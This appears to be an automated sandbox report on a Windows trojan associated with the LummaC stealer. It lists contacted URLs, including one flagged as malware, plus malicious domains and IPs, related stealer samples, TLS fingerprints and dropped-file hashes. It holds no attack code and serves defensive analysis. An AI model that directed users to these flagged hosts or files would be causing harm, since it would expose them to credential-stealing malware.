                                                                                                                                                                                                https://login.steampowered.com/1A68.tmp.exe, 00000003.00000003.2373597748.00000000009A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://store.steampowered.com/legal/1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373631508.0000000000914000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://effecterectz.xyz/api81A68.tmp.exe, 00000003.00000003.2327414310.000000000093D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: malware
                                                                                                                                                                                                          		unknown
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl1A68.tmp.exe, 00000003.00000003.2373829364.0000000003176000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A9000.00000004.00000020.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373574443.0000000003171000.00000004.00000800.00020000.00000000.sdmp, 1A68.tmp.exe, 00000003.00000003.2373470875.00000000009A3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high

                                                                                                                                                                                                              World Map of Contacted IPs

                                                                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                                                                              Public IPs

                                                                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                              104.21.22.222
                                                                                                                                                                                                              		immureprech.bizUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              104.21.96.1
                                                                                                                                                                                                              		deafeninggeh.bizUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              104.21.56.70
                                                                                                                                                                                                              		post-to-me.comUnited States
                                                                                                                                                                                                              		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                              23.55.153.106
                                                                                                                                                                                                              		steamcommunity.comUnited States
                                                                                                                                                                                                              		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                                                              176.113.115.19
                                                                                                                                                                                                              		unknownRussian Federation
                                                                                                                                                                                                              		49505SELECTELRUfalse

                                                                                                                                                                                                              General Information

                                                                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                              Analysis ID:1575138
                                                                                                                                                                                                              Start date and time:2024-12-14 14:15:18 +01:00
                                                                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                                                                              Overall analysis duration:0h 8m 51s
                                                                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                                                                              Report type:full
                                                                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                              Number of analysed new started processes analysed:14
                                                                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                                                                              Technologies:
                                                                                                                                                                                                              • HCA enabled
                                                                                                                                                                                                              • EGA enabled
                                                                                                                                                                                                              • AMSI enabled
                                                                                                                                                                                                              Analysis Mode:default
                                                                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                                                                              Sample name:rHrG691f7q.exe
                                                                                                                                                                                                              renamed because original name is a hash value
                                                                                                                                                                                                              Original Sample Name:f610013d7c84f779afa017218890e7ce.exe
                                                                                                                                                                                                              Detection:MAL
                                                                                                                                                                                                              Classification:mal100.troj.evad.winEXE@4/7@11/5
                                                                                                                                                                                                              EGA Information:
                                                                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                                                                              HCA Information:
                                                                                                                                                                                                              • Successful, ratio: 93%
                                                                                                                                                                                                              • Number of executed functions: 42
                                                                                                                                                                                                              • Number of non-executed functions: 326
                                                                                                                                                                                                              Cookbook Comments:
                                                                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                                                              Warnings

                                                                                                                                                                                                              • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 20.198.119.143, 52.168.117.173, 20.190.147.10, 20.74.47.205, 13.107.246.63, 4.245.163.56, 20.190.181.3, 20.199.58.43, 150.171.27.10
                                                                                                                                                                                                              • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, client.wns.windows.com, otelrules.azureedge.net, slscr.update.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com
                                                                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                              Simulations

                                                                                                                                                                                                              Behavior and APIs

                                                                                                                                                                                                              TimeTypeDescription
                                                                                                                                                                                                              08:16:18API Interceptor8220100x Sleep call for process: rHrG691f7q.exe modified
                                                                                                                                                                                                              08:16:25API Interceptor6x Sleep call for process: 1A68.tmp.exe modified
                                                                                                                                                                                                              08:16:40API Interceptor1x Sleep call for process: WerFault.exe modified

                                                                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                                                                              IPs

                                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                              104.21.22.222TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                  QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                    Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                        Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          Download-Roblox-Solara.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                            adv.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                                              http://gerxx.ruGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                https://tdazl.fgfhgjyukh.top/?jul=17Y2Fzc2FuZHJhLmFwbGV5QHRoZXJtb2Zpc2hlci5jb20=Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                  104.21.96.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                                                  • pelisplus.so/administrator/index.php
                                                                                                                                                                                                                                  Recibos.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                  • www.mffnow.info/1a34/
                                                                                                                                                                                                                                  104.21.56.70XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                    QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                      LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                        ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                          7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                            YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                              vwkb5DQRAL.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                Tg3sk2wywR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                  x8AH98H0eQ.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                    x8AH98H0eQ.exeGet hashmaliciousUnknownBrowse

                                                                                                                                                                                                                                                      Domains

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      immureprech.bizTN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.207.38
                                                                                                                                                                                                                                                      Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.207.38
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      • 172.67.207.38
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 172.67.207.38
                                                                                                                                                                                                                                                      Loader.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      post-to-me.comTN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      LXS5itpTK7.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      SEejSLAS9f.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      EbXj93v3bO.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      ssB9bjDQPf.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                      • 172.67.179.207
                                                                                                                                                                                                                                                      ief722WreR.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      7gxaFDUSOD.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      YQ3PhY2Aeq.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      steamcommunity.comTN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.102.49.254
                                                                                                                                                                                                                                                      Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106

                                                                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      CLOUDFLARENETUSTN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      PqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                                                                                      PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.207.38
                                                                                                                                                                                                                                                      Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 172.67.220.36
                                                                                                                                                                                                                                                      order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 104.21.90.137
                                                                                                                                                                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                      • 172.67.177.134
                                                                                                                                                                                                                                                      CLOUDFLARENETUSsetup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.58.24
                                                                                                                                                                                                                                                      TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      PqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                                                                                      PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.207.38
                                                                                                                                                                                                                                                      Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 172.67.220.36
                                                                                                                                                                                                                                                      order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 104.21.90.137
                                                                                                                                                                                                                                                      CLOUDFLARENETUSTN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      PqCznDthHP.exeGet hashmaliciousEdge StealerBrowse
                                                                                                                                                                                                                                                      • 104.26.13.205
                                                                                                                                                                                                                                                      PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                      • 104.21.84.67
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 172.67.207.38
                                                                                                                                                                                                                                                      Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.112.1
                                                                                                                                                                                                                                                      ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 172.67.220.36
                                                                                                                                                                                                                                                      order confirmation.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                                                      • 104.21.90.137
                                                                                                                                                                                                                                                      Shipment 990847575203.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                                                                                                                      • 172.67.177.134

                                                                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      a0e9f5d64349fb13191bc781f81f42e1TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      HIDE0RerES.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      Dqw8QFydEX.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      Setup.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                      • 23.55.153.106
                                                                                                                                                                                                                                                      • 104.21.22.222
                                                                                                                                                                                                                                                      • 104.21.96.1
                                                                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      TN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      7VfKPMdmiX.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70
                                                                                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                                      • 104.21.56.70

                                                                                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\ScreenUpdateSync[1].exeTN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                        XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                          QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                            C:\Users\user\AppData\Local\Temp\1A68.tmp.exeTN78WX7nJU.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                              XIaCqh1vRm.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                                QQx0tdFC0b.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_1A68.tmp.exe_f046d317ddc4da7876fd02d478df784e49cd2ef_ba4fb3ae_5a22b558-2650-4d3e-afd4-5eaaceb942f6\Report.wer

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):65536
                                                                                                                                                                                                                                                                  Entropy (8bit):0.9580075629932736
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:bHspIK+TM0Qp+sVTaju3RzuiF6Z24IO85:jlKqQp+sVGjgzuiF6Y4IO85
                                                                                                                                                                                                                                                                  MD5:3D8E498D9252BA073A094CE27FCEBAF8
                                                                                                                                                                                                                                                                  SHA1:8C2C9594026B1745BD5E92D286DA890DBEE62F52
                                                                                                                                                                                                                                                                  SHA-256:A5FB892DE193AD0EDAC75E3516806032E308A8272DAF7D0D729BF983C61F2D58
                                                                                                                                                                                                                                                                  SHA-512:89EDE077A04D7679F8F2E663380E0A678ACFB950A3711ED1F95CE38B1EE7161881DE354532189404288836F271DF642F411DE629D2E24030EF646022EA9ABD16
                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.6.5.5.7.9.5.0.3.6.6.1.5.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.6.5.5.7.9.5.4.7.4.1.1.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.2.2.b.5.5.8.-.2.6.5.0.-.4.d.3.e.-.a.f.d.4.-.5.e.a.a.c.e.b.9.4.2.f.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.4.5.7.3.9.7.0.-.e.6.e.c.-.4.7.3.f.-.a.4.a.c.-.e.c.8.e.3.b.b.7.b.d.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.1.A.6.8...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.e.a.4.-.0.0.0.1.-.0.0.1.5.-.8.1.2.2.-.3.7.5.e.2.a.4.e.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.3.8.8.a.0.8.5.1.0.0.5.8.e.4.0.8.f.4.2.c.5.5.c.2.8.d.d.2.3.c.8.0.0.0.0.f.f.f.f.!.0.0.0.0.4.a.2.0.9.5.6.9.0.b.a.8.f.1.3.2.5.d.d.1.0.1.6.7.3.1.8.7.2.8.4.4.7.d.1.2.0.5.8.a.!.1.A.6.8...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.

                                                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER24F7.tmp.dmp

                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Sat Dec 14 13:16:35 2024, 0x1205a4 type
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):46254
                                                                                                                                                                                                                                                                  Entropy (8bit):2.566770614452791
                                                                                                                                                                                                                                                                  Encrypted:false
